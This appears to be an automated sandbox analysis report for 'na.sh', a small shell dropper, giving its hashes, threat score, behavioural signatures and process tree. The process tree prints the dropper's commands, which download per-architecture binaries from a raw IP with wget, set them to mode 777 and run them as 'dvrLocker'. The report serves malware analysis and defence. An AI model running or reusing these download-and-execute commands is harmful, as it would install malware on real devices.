Overview

overview

7

Static

static

1

na.sh

ubuntu-18.04-amd64

7

na.sh

debian-9-armhf

7

na.sh

debian-9-mips

7

na.sh

debian-9-mipsel

7

Analysis

  • max time kernel
    141s
  • max time network
    134s
  • platform
    debian-9_mipsel
  • resource
    debian9-mipsel-20240418-en
  • resource tags

    arch:mipselimage:debian9-mipsel-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
  • submitted
    10-10-2024 07:02

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    na.sh

  • Size

    372B

  • MD5

    6b2644c0adca68c54a53a79842eb3b3c

  • SHA1

    d26ec0f0fc70fcb713aba5fa56912809cefb8bc0

  • SHA256

    89e3309d765c4f00090a446b6599b23a3d2334aec380f52cb7d9c89da2683e6f

  • SHA512

    943667c0ddec5ed4ec3a8d66d8997078a9b04f3b48b937f5e3b339f039d53c495a27a3253c504edc22704c394bb197455ace2e1c45e17eeda806b3b4200fb90c

Score
7/10
credential_accessdefense_evasiondiscovery

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 5 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Deletes itself 1 IoCs
  • Executes dropped EXE 5 IoCs
  • Unexpected DNS network traffic destination 1 IoCs

    Network traffic to other servers than the configured DNS servers was detected on the DNS port.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Reads process memory 1 TTPs 4 IoCs

    Read the memory of a process through the /proc virtual filesystem. This can be used to steal credentials.

    credential_access
  • Changes its process name 1 IoCs
  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • System Network Configuration Discovery 1 TTPs 1 IoCs

    Adversaries may gather information about the network configuration of a system.

    discovery
  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/na.sh
    /tmp/na.sh
    1⤵
    • Writes file to tmp directory
    PID:710
    • /bin/rm
      rm -rf dvrLocker
      2⤵
        PID:712
      • /usr/bin/wget
        wget http://185.157.247.125/c/empsl -O -
        2⤵
          PID:714
        • /bin/chmod
          chmod 777 dvrLocker
          2⤵
          • File and Directory Permissions Modification
          PID:728
        • /dvrLocker
          ./dvrLocker tplink.new
          2⤵
          • Deletes itself
          • Executes dropped EXE
          • Reads process memory
          • Changes its process name
          • Reads runtime system information
          PID:730
        • /usr/bin/wget
          wget http://185.157.247.125/c/emips -O -
          2⤵
          • System Network Configuration Discovery
          PID:733
        • /bin/chmod
          chmod 777 dvrLocker
          2⤵
          • File and Directory Permissions Modification
          PID:736
        • /dvrLocker
          ./dvrLocker tplink.new
          2⤵
          • Executes dropped EXE
          PID:738
        • /bin/sh
          /bin/sh ./dvrLocker tplink.new
          2⤵
            PID:738
          • /usr/bin/wget
            wget http://185.157.247.125/c/earm -O -
            2⤵
              PID:746
            • /bin/chmod
              chmod 777 dvrLocker
              2⤵
              • File and Directory Permissions Modification
              PID:747
            • /dvrLocker
              ./dvrLocker tplink.new
              2⤵
              • Executes dropped EXE
              PID:749
            • /bin/sh
              /bin/sh ./dvrLocker tplink.new
              2⤵
                PID:749
              • /usr/bin/wget
                wget http://185.157.247.125/c/earm7 -O -
                2⤵
                  PID:756
                • /bin/chmod
                  chmod 777 dvrLocker
                  2⤵
                  • File and Directory Permissions Modification
                  PID:758
                • /dvrLocker
                  ./dvrLocker tplink.new
                  2⤵
                  • Executes dropped EXE
                  PID:759
                • /bin/sh
                  /bin/sh ./dvrLocker tplink.new
                  2⤵
                    PID:759
                  • /usr/bin/wget
                    wget http://185.157.247.125/c/ex86 -O -
                    2⤵
                      PID:762
                    • /bin/chmod
                      chmod 777 dvrLocker
                      2⤵
                      • File and Directory Permissions Modification
                      PID:763
                    • /dvrLocker
                      ./dvrLocker tplink.new
                      2⤵
                      • Executes dropped EXE
                      PID:764
                    • /bin/sh
                      /bin/sh ./dvrLocker tplink.new
                      2⤵
                        PID:764

                    Network

                    MITRE ATT&CK Enterprise v15

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • /dvrLocker
                      Filesize

                      41KB

                      MD5

                      3cfc76868e26201ac03e0583b7c8aaba

                      SHA1

                      03436d9d090e1f944fecf60adc1e45f90df20c26

                      SHA256

                      8c825ecd4fff08b44d8334e022dc0d6eedbe9a1b61469e523025d7968be2e84d

                      SHA512

                      84add49907a7c8818abc31118e16e8becf3bb41bcf814139fe0c99617b9ff46dc228be8a319e3fd80f0a672bc056cb30bb75ff0a4ed03418cd06cc95ef5070b2

                      Download Submit